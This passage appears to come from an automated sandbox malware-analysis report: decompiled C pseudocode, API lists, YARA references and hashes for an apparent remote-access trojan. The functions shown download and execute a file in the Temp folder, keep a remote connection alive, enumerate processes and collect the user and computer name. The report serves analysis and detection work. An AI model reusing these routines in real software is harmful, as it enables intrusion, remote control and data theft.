                                                                                                0x00405ed9
                                                                                                0x00405ee3
                                                                                                0x00405eef
                                                                                                0x00405ef4
                                                                                                0x00405efa
                                                                                                0x00405f01
                                                                                                0x00405f06
                                                                                                0x00405f09
                                                                                                0x00405f0b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00405F40
                                                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406024
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DownloadExecuteFileShell
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\rem9090sta.exe$open
                                                                                                • API String ID: 2825088817-1143938698
                                                                                                • Opcode ID: a4dd419c696ae0d0248e5aa65d548bca7d7e39d9684c990360edbd319c8855ca
                                                                                                • Instruction ID: 62a2329586a9e067be36f797b192da2b2e54cee08630cab9a0d64ec101ad354f
                                                                                                • Opcode Fuzzy Hash: a4dd419c696ae0d0248e5aa65d548bca7d7e39d9684c990360edbd319c8855ca
                                                                                                • Instruction Fuzzy Hash: CB61EF7160430116CA14FB76C8969BF32A99B81348F500A3FF843772D2EE3C9D4A869B
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00405038, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 90%
                                                                                                			E00405038(void* __ecx, intOrPtr _a4, char _a8) {
				struct _SYSTEMTIME _v20;
				char _v44;
				void* __edi;
				void* _t16;
				void* _t21;
				intOrPtr _t29;
				void* _t31;
				void* _t32;

				_t31 = __ecx;
				if( *((char*)(__ecx + 0x5c)) != 0) {
					__eflags = 0;
					return 0;
				}
				_t29 = _a4;
				if(_a8 != 0) {
					__eflags =  *0x46daf7;
					if( *0x46daf7 != 0) {
						GetLocalTime( &_v20);
						_t16 = E00417C16(_t21,  &_v44, _t29);
						_t33 = _t32 - 0x18;
						E004053F2(_t21, _t32 - 0x18, "Connection KeepAlive  | Enabled | Timeout: ", _t29, __eflags, _t16);
						E00402076(_t21, _t33 - 0x14, "i");
						E00417670(_t21, _t29);
						E00401FB9();
					}
				} else {
					 *((char*)(__ecx + 0x7c)) = 1;
				}
				 *((intOrPtr*)(_t31 + 0x74)) = _t29;
				 *((char*)(_t31 + 0x5c)) = 1;
				 *((intOrPtr*)(_t31 + 0x60)) = CreateEventA(0, 0, 0, 0);
				CreateThread(0, 0, E00405237, _t31, 0, 0);
				return 1;
			}











                                                                                                0x0040503f
                                                                                                0x00405046
                                                                                                0x004050d1
                                                                                                0x00000000
                                                                                                0x004050d1
                                                                                                0x00405050
                                                                                                0x00405053
                                                                                                0x0040505b
                                                                                                0x00405062
                                                                                                0x00405068
                                                                                                0x00405073
                                                                                                0x00405078
                                                                                                0x00405083
                                                                                                0x00405092
                                                                                                0x00405097
                                                                                                0x004050a2
                                                                                                0x004050a2
                                                                                                0x00405055
                                                                                                0x00405055
                                                                                                0x00405055
                                                                                                0x004050a7
                                                                                                0x004050b0
                                                                                                0x004050c4
                                                                                                0x004050c7
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(?), ref: 00405068
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004050B4
                                                                                                • CreateThread.KERNEL32(00000000,00000000,00405237,?,00000000,00000000), ref: 004050C7
                                                                                                Strings
                                                                                                • Connection KeepAlive | Enabled | Timeout: , xrefs: 0040507B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Create$EventLocalThreadTime
                                                                                                • String ID: Connection KeepAlive | Enabled | Timeout:
                                                                                                • API String ID: 2532271599-507513762
                                                                                                • Opcode ID: 1bd94366b2bec91859cbdac8bdfae94c1b43c4a1124927e236addb255ca7d1d5
                                                                                                • Instruction ID: 3f96d6673231960727e2550b4967c774dcc62df2d79dd627a582bacf63a0d9ff
                                                                                                • Opcode Fuzzy Hash: 1bd94366b2bec91859cbdac8bdfae94c1b43c4a1124927e236addb255ca7d1d5
                                                                                                • Instruction Fuzzy Hash: 3D11A3719047806BC720A76B9C0DE9B7FBCDBD2754F04406FF84166292DAB89485CFB6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0044B1A8, Relevance: 6.2, APIs: 4, Instructions: 236COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 68%
                                                                                                			E0044B1A8(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				short _v12;
				signed int _v32;
				intOrPtr _v40;
				signed int _v52;
				char _v272;
				short _v292;
				void* __ebp;
				void* _t34;
				short* _t35;
				intOrPtr* _t36;
				signed int _t39;
				signed short* _t44;
				intOrPtr _t47;
				void* _t49;
				signed int _t52;
				signed int _t58;
				signed int _t60;
				signed int _t66;
				void* _t68;
				void* _t71;
				void* _t76;
				void* _t80;
				intOrPtr _t87;
				short* _t89;
				void* _t90;
				void* _t92;
				short _t94;
				void* _t95;
				intOrPtr* _t98;
				void* _t112;
				void* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				signed int* _t122;
				intOrPtr* _t125;
				signed short _t127;
				int _t129;
				signed int _t132;
				void* _t133;
				signed int _t134;

				_t115 = __edx;
				_push(__ecx);
				_push(__ecx);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t34 = E00442F68(__ebx, __ecx, __edx);
				_t87 = _a4;
				_t94 = 0;
				_v12 = 0;
				_t3 = _t34 + 0x50; // 0x50
				_t125 = _t3;
				_t4 = _t125 + 0x250; // 0x2a0
				_t35 = _t4;
				 *((intOrPtr*)(_t125 + 8)) = 0;
				 *_t35 = 0;
				_t6 = _t125 + 4; // 0x54
				_t118 = _t6;
				_v8 = _t35;
				_t36 = _t87 + 0x80;
				 *_t125 = _t87;
				 *_t118 = _t36;
				if( *_t36 != 0) {
					E0044B139(0x45af00, 0x16, _t118);
					_t133 = _t133 + 0xc;
					_t94 = 0;
				}
				_push(_t125);
				if( *((intOrPtr*)( *_t125)) == _t94) {
					E0044AAAA(_t87, _t94, _t115, _t118, __eflags);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t118)) == _t94) {
						E0044ABCD();
					} else {
						E0044AB33(_t94);
					}
					_pop(_t95);
					if( *((intOrPtr*)(_t125 + 8)) == 0) {
						_t80 = E0044B139(0x45abf0, 0x40, _t125);
						_t133 = _t133 + 0xc;
						if(_t80 != 0) {
							_push(_t125);
							if( *((intOrPtr*)( *_t118)) == 0) {
								E0044ABCD();
							} else {
								E0044AB33(0);
							}
							L12:
							_pop(_t95);
						}
					}
				}
				if( *((intOrPtr*)(_t125 + 8)) == 0) {
					L31:
					_t39 = 0;
					__eflags = 0;
					goto L32;
				} else {
					_t127 = E0044B007(_t95, _t87 + 0x100, _t125);
					if(_t127 == 0 || _t127 == 0xfde8 || _t127 == 0xfde9 || IsValidCodePage(_t127 & 0x0000ffff) == 0) {
						goto L31;
					} else {
						_t44 = _a8;
						if(_t44 != 0) {
							 *_t44 = _t127;
						}
						_t121 = _a12;
						if(_t121 == 0) {
							L30:
							_t39 = 1;
							goto L32;
						} else {
							_t98 = _v8;
							_t15 = _t121 + 0x120; // 0x43f6c8
							_t89 = _t15;
							 *_t89 = 0;
							_t116 = _t98 + 2;
							do {
								_t47 =  *_t98;
								_t98 = _t98 + 2;
							} while (_t47 != _v12);
							_t100 = _t98 - _t116 >> 1;
							_push((_t98 - _t116 >> 1) + 1);
							_t49 = E00449599(_t98 - _t116 >> 1, _t89, 0x55, _v8);
							_t134 = _t133 + 0x10;
							_t153 = _t49;
							if(_t49 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E00437736();
								asm("int3");
								_t132 = _t134;
								_t52 =  *0x46c00c; // 0x4cc22724
								_v52 = _t52 ^ _t132;
								_push(_t89);
								_push(_t127);
								_push(_t121);
								_t90 = E00442F68(_t89, _t100, _t116);
								_t122 =  *(E00442F68(_t90, _t100, _t116) + 0x34c);
								_t129 = E0044B8BB(_v40);
								asm("sbb ecx, ecx");
								_t58 = GetLocaleInfoW(_t129, ( ~( *(_t90 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								__eflags = _t58;
								if(_t58 != 0) {
									_t60 = E0044E1A1(_t90, _t122, _t129,  *((intOrPtr*)(_t90 + 0x54)),  &_v272);
									__eflags = _t60;
									if(_t60 == 0) {
										_t66 = E0044B9EF(_t129);
										__eflags = _t66;
										if(_t66 != 0) {
											 *_t122 =  *_t122 | 0x00000004;
											__eflags =  *_t122;
											_t122[2] = _t129;
											_t122[1] = _t129;
										}
									}
									__eflags =  !( *_t122 >> 2) & 0x00000001;
								} else {
									 *_t122 =  *_t122 & _t58;
								}
								__eflags = _v32 ^ _t132;
								return E00430A5B(_v32 ^ _t132);
							} else {
								_t68 = E00443640(_t100, _t127, _t153, _t89, 0x1001, _t121, 0x40);
								_t154 = _t68;
								if(_t68 == 0) {
									goto L31;
								} else {
									_t20 = _t121 + 0x80; // 0x43f628
									_t92 = _t20;
									_t21 = _t121 + 0x120; // 0x43f6c8
									if(E00443640(_t100, _t127, _t154, _t21, 0x1002, _t92, 0x40) == 0) {
										goto L31;
									} else {
										_push(0x5f);
										_t71 = E00452197(_t100);
										_t112 = _t92;
										if(_t71 != 0) {
											L28:
											_t22 = _t121 + 0x120; // 0x43f6c8
											if(E00443640(_t112, _t127, _t157, _t22, 7, _t92, 0x40) == 0) {
												goto L31;
											} else {
												goto L29;
											}
										} else {
											_push(0x2e);
											_t76 = E00452197(_t112);
											_t112 = _t92;
											_t157 = _t76;
											if(_t76 == 0) {
												L29:
												_t23 = _t121 + 0x100; // 0x43f6a8
												E0043CE14(_t112, _t127, _t23, 0x10, 0xa);
												goto L30;
											} else {
												goto L28;
											}
										}
									}
								}
								L32:
								return _t39;
							}
						}
					}
				}
			}












































                                                                                                0x0044b1a8
                                                                                                0x0044b1ad
                                                                                                0x0044b1ae
                                                                                                0x0044b1af
                                                                                                0x0044b1b0
                                                                                                0x0044b1b1
                                                                                                0x0044b1b2
                                                                                                0x0044b1b7
                                                                                                0x0044b1ba
                                                                                                0x0044b1bc
                                                                                                0x0044b1bf
                                                                                                0x0044b1bf
                                                                                                0x0044b1c2
                                                                                                0x0044b1c2
                                                                                                0x0044b1c8
                                                                                                0x0044b1cb
                                                                                                0x0044b1ce
                                                                                                0x0044b1ce
                                                                                                0x0044b1d1
                                                                                                0x0044b1d4
                                                                                                0x0044b1da
                                                                                                0x0044b1dc
                                                                                                0x0044b1e1
                                                                                                0x0044b1eb
                                                                                                0x0044b1f0
                                                                                                0x0044b1f3
                                                                                                0x0044b1f3
                                                                                                0x0044b1f7
                                                                                                0x0044b1fb
                                                                                                0x0044b244
                                                                                                0x00000000
                                                                                                0x0044b1fd
                                                                                                0x0044b202
                                                                                                0x0044b20b
                                                                                                0x0044b204
                                                                                                0x0044b204
                                                                                                0x0044b204
                                                                                                0x0044b212
                                                                                                0x0044b216
                                                                                                0x0044b220
                                                                                                0x0044b225
                                                                                                0x0044b22a
                                                                                                0x0044b230
                                                                                                0x0044b234
                                                                                                0x0044b23d
                                                                                                0x0044b236
                                                                                                0x0044b236
                                                                                                0x0044b236
                                                                                                0x0044b249
                                                                                                0x0044b249
                                                                                                0x0044b249
                                                                                                0x0044b22a
                                                                                                0x0044b216
                                                                                                0x0044b24f
                                                                                                0x0044b361
                                                                                                0x0044b361
                                                                                                0x0044b361
                                                                                                0x00000000
                                                                                                0x0044b255
                                                                                                0x0044b262
                                                                                                0x0044b268
                                                                                                0x00000000
                                                                                                0x0044b298
                                                                                                0x0044b298
                                                                                                0x0044b29d
                                                                                                0x0044b29f
                                                                                                0x0044b29f
                                                                                                0x0044b2a1
                                                                                                0x0044b2a6
                                                                                                0x0044b35c
                                                                                                0x0044b35e
                                                                                                0x00000000
                                                                                                0x0044b2ac
                                                                                                0x0044b2ac
                                                                                                0x0044b2af
                                                                                                0x0044b2af
                                                                                                0x0044b2b7
                                                                                                0x0044b2ba
                                                                                                0x0044b2bd
                                                                                                0x0044b2bd
                                                                                                0x0044b2c0
                                                                                                0x0044b2c3
                                                                                                0x0044b2cb
                                                                                                0x0044b2d0
                                                                                                0x0044b2d7
                                                                                                0x0044b2dc
                                                                                                0x0044b2df
                                                                                                0x0044b2e1
                                                                                                0x0044b36c
                                                                                                0x0044b36d
                                                                                                0x0044b36e
                                                                                                0x0044b36f
                                                                                                0x0044b370
                                                                                                0x0044b371
                                                                                                0x0044b376
                                                                                                0x0044b37a
                                                                                                0x0044b382
                                                                                                0x0044b389
                                                                                                0x0044b38c
                                                                                                0x0044b38d
                                                                                                0x0044b391
                                                                                                0x0044b397
                                                                                                0x0044b39f
                                                                                                0x0044b3ae
                                                                                                0x0044b3ba
                                                                                                0x0044b3cb
                                                                                                0x0044b3d1
                                                                                                0x0044b3d3
                                                                                                0x0044b3e4
                                                                                                0x0044b3eb
                                                                                                0x0044b3ed
                                                                                                0x0044b3f0
                                                                                                0x0044b3f6
                                                                                                0x0044b3f8
                                                                                                0x0044b3fa
                                                                                                0x0044b3fa
                                                                                                0x0044b3fd
                                                                                                0x0044b400
                                                                                                0x0044b400
                                                                                                0x0044b3f8
                                                                                                0x0044b40a
                                                                                                0x0044b3d5
                                                                                                0x0044b3d5
                                                                                                0x0044b3d7
                                                                                                0x0044b412
                                                                                                0x0044b41d
                                                                                                0x0044b2e7
                                                                                                0x0044b2f0
                                                                                                0x0044b2f5
                                                                                                0x0044b2f7
                                                                                                0x00000000
                                                                                                0x0044b2f9
                                                                                                0x0044b2fb
                                                                                                0x0044b2fb
                                                                                                0x0044b307
                                                                                                0x0044b315
                                                                                                0x00000000
                                                                                                0x0044b317
                                                                                                0x0044b317
                                                                                                0x0044b31a
                                                                                                0x0044b320
                                                                                                0x0044b323
                                                                                                0x0044b333
                                                                                                0x0044b338
                                                                                                0x0044b346
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b325
                                                                                                0x0044b325
                                                                                                0x0044b328
                                                                                                0x0044b32e
                                                                                                0x0044b32f
                                                                                                0x0044b331
                                                                                                0x0044b348
                                                                                                0x0044b34c
                                                                                                0x0044b354
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b331
                                                                                                0x0044b323
                                                                                                0x0044b315
                                                                                                0x0044b363
                                                                                                0x0044b369
                                                                                                0x0044b369
                                                                                                0x0044b2e1
                                                                                                0x0044b2a6
                                                                                                0x0044b268

                                                                                                APIs
                                                                                                  • Part of subcall function 00442F68: GetLastError.KERNEL32(?,0043CA3A,004362A5,0043CA3A,0046E268,?,0043A7BA,FF8BC35D,0046E268,0046E268), ref: 00442F6C
                                                                                                  • Part of subcall function 00442F68: _free.LIBCMT ref: 00442F9F
                                                                                                  • Part of subcall function 00442F68: SetLastError.KERNEL32(00000000,FF8BC35D,0046E268,0046E268), ref: 00442FE0
                                                                                                  • Part of subcall function 00442F68: _abort.LIBCMT ref: 00442FE6
                                                                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0043F5A8,?,?,?,?,0043EFFF,?,00000004), ref: 0044B28A
                                                                                                • _wcschr.LIBVCRUNTIME ref: 0044B31A
                                                                                                • _wcschr.LIBVCRUNTIME ref: 0044B328
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,0043F5A8,00000000,0043F6C8), ref: 0044B3CB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 4212172061-0
                                                                                                • Opcode ID: 1370c1f50b4f1f3129fb197c9123c441405972bfb2e2033a346c40f78388a1a4
                                                                                                • Instruction ID: e7cff9f53cbf318a7152ade50442d9f1eda1ec1d3f6e12deb6ca4520c2250c00
                                                                                                • Opcode Fuzzy Hash: 1370c1f50b4f1f3129fb197c9123c441405972bfb2e2033a346c40f78388a1a4
                                                                                                • Instruction Fuzzy Hash: C661F871600706AAF724AF76CC46AAB73A8FF08704F14046FF905D7281EB78ED5187A9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040D25B, Relevance: 6.1, APIs: 4, Instructions: 127processCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E0040D25B(void* __ebx, void* __ecx, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				char _v196;
				char _v220;
				char _v244;
				char _v268;
				char _v292;
				char _v316;
				char _v340;
				char _v864;
				intOrPtr _v892;
				void* _v900;
				void* __edi;
				void* __esi;
				void* _t47;
				void* _t48;
				void* _t50;
				void* _t129;
				void* _t130;

				_t77 = __ecx;
				_t76 = __ebx;
				_t129 = __ecx;
				E004020C7(__ebx, __ecx);
				 *0x46dea8 = E00418004(_t77);
				_t130 = CreateToolhelp32Snapshot(2, 0);
				if(_t130 != 0) {
					_v900 = 0x22c;
					Process32FirstW(_t130,  &_v900);
					while(Process32NextW(_t130,  &_v900) != 0) {
						E00404260(_t76,  &_v28,  &_v864);
						_t47 = E00417C16(_t76,  &_v340, E00418032(_v892) & 0x000000ff);
						_t48 = E00417C16(_t76,  &_v316, _v892);
						_t50 = E00417D8C(_t76,  &_v268, E00418068( &_v292, _v892));
						E00401FC3(_t129, _t58, _t130, E004076BB(_t76,  &_v52, E00402F0F( &_v76, E004076BB(_t76,  &_v100, E00402F0F( &_v124, E004076BB(_t76,  &_v148, E00402F0F( &_v172, E004076BB(_t76,  &_v196, E00407653(_t76,  &_v220, _t129, __eflags, E00417D8C(_t76,  &_v244,  &_v28)), _t129, __eflags, 0x4616b8), _t50), _t129, __eflags, 0x4616b8), _t48), _t129, __eflags, 0x4616b8), _t47), _t129, __eflags, "|"));
						E00401FB9();
						E00401FB9();
						E00401FB9();
						E00401FB9();
						E00401FB9();
						E00401FB9();
						E00401FB9();
						E00401FB9();
						E00401FB9();
						E00401FB9();
						E00401EE2();
						E00401FB9();
						E00401FB9();
						E00401EE2();
					}
					CloseHandle(_t130);
				}
				return _t129;
			}



























                                                                                                0x0040d25b
                                                                                                0x0040d25b
                                                                                                0x0040d266
                                                                                                0x0040d268
                                                                                                0x0040d276
                                                                                                0x0040d281
                                                                                                0x0040d285
                                                                                                0x0040d291
                                                                                                0x0040d29d
                                                                                                0x0040d41c
                                                                                                0x0040d2b2
                                                                                                0x0040d2d0
                                                                                                0x0040d2e7
                                                                                                0x0040d30b
                                                                                                0x0040d38c
                                                                                                0x0040d394
                                                                                                0x0040d39c
                                                                                                0x0040d3a4
                                                                                                0x0040d3ac
                                                                                                0x0040d3b7
                                                                                                0x0040d3c2
                                                                                                0x0040d3cd
                                                                                                0x0040d3d8
                                                                                                0x0040d3e3
                                                                                                0x0040d3ee
                                                                                                0x0040d3f9
                                                                                                0x0040d404
                                                                                                0x0040d40f
                                                                                                0x0040d417
                                                                                                0x0040d417
                                                                                                0x0040d433
                                                                                                0x0040d433
                                                                                                0x0040d440

                                                                                                APIs
                                                                                                  • Part of subcall function 00418004: GetCurrentProcess.KERNEL32(?,?,?,00418AC1,WinDir,00000000,00000000), ref: 00418015
                                                                                                  • Part of subcall function 00418004: IsWow64Process.KERNEL32(00000000,?,?,00418AC1,WinDir,00000000,00000000), ref: 0041801C
                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 0040D27B
                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040D29D
                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040D424
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040D433
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ProcessProcess32$CloseCreateCurrentFirstHandleNextSnapshotToolhelp32Wow64
                                                                                                • String ID:
                                                                                                • API String ID: 715332099-0
                                                                                                • Opcode ID: 623ac24f0f991b9a062ca38a056801867b3058eb7de3a7201af57816754bbfca
                                                                                                • Instruction ID: 44330af9aa380f0d7c1b7aa6eb1ee91066a4386cc69fad06cd4b56d0774bd59c
                                                                                                • Opcode Fuzzy Hash: 623ac24f0f991b9a062ca38a056801867b3058eb7de3a7201af57816754bbfca
                                                                                                • Instruction Fuzzy Hash: 494150719041298BC714F7A5DC95EEDB378AF54308F1002BEF10A721E2EF789E89CA59
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0041778E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 82%
                                                                                                			E0041778E(void* __ecx, void* __edi, void* __eflags) {
				char _v8;
				long _v12;
				char _v36;
				char _v60;
				char _v92;
				short _v604;
				void* _t26;
				void* _t38;
				void* _t39;

				_t39 = __eflags;
				_v8 = 0x10;
				_t38 = __ecx;
				 *0x46dea4(1,  &_v92,  &_v8);
				_v12 = 0x100;
				GetUserNameW( &_v604,  &_v12);
				E00403098(_t26, _t38, E004043E6(_t26,  &_v36,  &_v92, _t39, E00404260(_t26,  &_v60, "/")), __edi, _t39,  &_v604);
				E00401EE2();
				E00401EE2();
				return _t38;
			}












                                                                                                0x0041778e
                                                                                                0x0041779b
                                                                                                0x004177a6
                                                                                                0x004177ab
                                                                                                0x004177b4
                                                                                                0x004177c3
                                                                                                0x004177ee
                                                                                                0x004177f7
                                                                                                0x004177ff
                                                                                                0x0041780a

                                                                                                APIs
                                                                                                • GetComputerNameExW.KERNEL32(00000001,?,00000037,hpg), ref: 004177AB
                                                                                                • GetUserNameW.ADVAPI32(?,00000010), ref: 004177C3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Name$ComputerUser
                                                                                                • String ID: hpg
                                                                                                • API String ID: 4229901323-1164758663
                                                                                                • Opcode ID: 3a91e7c9c85b8e38fe3e30744da5450a5ad0918e5044f29859edf51263ce7b81
                                                                                                • Instruction ID: bc3ddf2579cab3824883f85f976b1990b9072a0b54287e00b7ea6f78515a8f6d
                                                                                                • Opcode Fuzzy Hash: 3a91e7c9c85b8e38fe3e30744da5450a5ad0918e5044f29859edf51263ce7b81
                                                                                                • Instruction Fuzzy Hash: 76011271A0011DABCB14EBE1DC45ADDB7BCEF44319F10017BF905B6191EEB46B898B98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0044B593, Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 92%
                                                                                                			E0044B593(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				signed int _v252;
				intOrPtr _v256;
				void* __ebp;
				signed int _t50;
				signed int _t58;
				signed int _t67;
				signed int _t69;
				signed int _t72;
				signed int _t73;
				intOrPtr _t75;
				signed int _t76;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed int _t89;
				intOrPtr _t90;
				void* _t92;
				intOrPtr* _t113;
				void* _t117;
				intOrPtr* _t119;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				void* _t127;
				signed int* _t129;
				int _t132;
				signed int _t133;
				void* _t134;

				_t50 =  *0x46c00c; // 0x4cc22724
				_v8 = _t50 ^ _t133;
				_t92 = E00442F68(__ebx, __ecx, __edx);
				_t129 =  *(E00442F68(_t92, __ecx, __edx) + 0x34c);
				_t132 = E0044B8BB(_a4);
				asm("sbb ecx, ecx");
				if(GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78) != 0) {
					_t58 = E0044E1A1(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x54)),  &_v248);
					_v252 = _v252 & 0x00000000;
					__eflags = _t58;
					if(_t58 != 0) {
						L18:
						__eflags = ( *_t129 & 0x00000300) - 0x300;
						if(( *_t129 & 0x00000300) == 0x300) {
							L39:
							__eflags =  !( *_t129 >> 2) & 0x00000001;
							L40:
							return E00430A5B(_v8 ^ _t133);
						}
						asm("sbb ecx, ecx");
						_t67 = GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
						__eflags = _t67;
						if(_t67 != 0) {
							_t69 = E0044E1A1(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
							__eflags = _t69;
							if(_t69 != 0) {
								__eflags =  *(_t92 + 0x60);
								if( *(_t92 + 0x60) != 0) {
									goto L39;
								}
								__eflags =  *(_t92 + 0x5c);
								if( *(_t92 + 0x5c) == 0) {
									goto L39;
								}
								_t72 = E0044E1A1(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
								__eflags = _t72;
								if(_t72 != 0) {
									goto L39;
								}
								_push(_t129);
								_t73 = E0044BA13(0, _t132, 0);
								__eflags = _t73;
								if(_t73 == 0) {
									goto L39;
								}
								 *_t129 =  *_t129 | 0x00000100;
								__eflags = _t129[1];
								L37:
								if(__eflags == 0) {
									_t129[1] = _t132;
								}
								goto L39;
							}
							 *_t129 =  *_t129 | 0x00000200;
							_t123 =  *_t129;
							__eflags =  *(_t92 + 0x60) - _t69;
							if( *(_t92 + 0x60) == _t69) {
								__eflags =  *(_t92 + 0x5c) - _t69;
								if( *(_t92 + 0x5c) == _t69) {
									goto L23;
								}
								_t113 =  *((intOrPtr*)(_t92 + 0x50));
								_v256 = _t113 + 2;
								do {
									_t75 =  *_t113;
									_t113 = _t113 + 2;
									__eflags = _t75 - _v252;
								} while (_t75 != _v252);
								__eflags = _t113 - _v256 >> 1 -  *(_t92 + 0x5c);
								if(_t113 - _v256 >> 1 !=  *(_t92 + 0x5c)) {
									_t69 = 0;
									goto L23;
								}
								_push(_t129);
								_t76 = E0044BA13(_t92, _t132, 1);
								__eflags = _t76;
								if(_t76 == 0) {
									goto L39;
								}
								 *_t129 =  *_t129 | 0x00000100;
								_t69 = 0;
								L24:
								__eflags = _t129[1] - _t69;
								goto L37;
							}
							L23:
							_t124 = _t123 | 0x00000100;
							__eflags = _t124;
							 *_t129 = _t124;
							goto L24;
						}
						 *_t129 = _t67;
						L2:
						goto L40;
					}
					asm("sbb eax, eax");
					_t84 = GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
					__eflags = _t84;
					if(_t84 == 0) {
						goto L1;
					}
					_t86 = E0044E1A1(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
					_pop(_t117);
					__eflags = _t86;
					if(_t86 != 0) {
						__eflags =  *_t129 & 0x00000002;
						if(( *_t129 & 0x00000002) != 0) {
							goto L18;
						}
						__eflags =  *(_t92 + 0x5c);
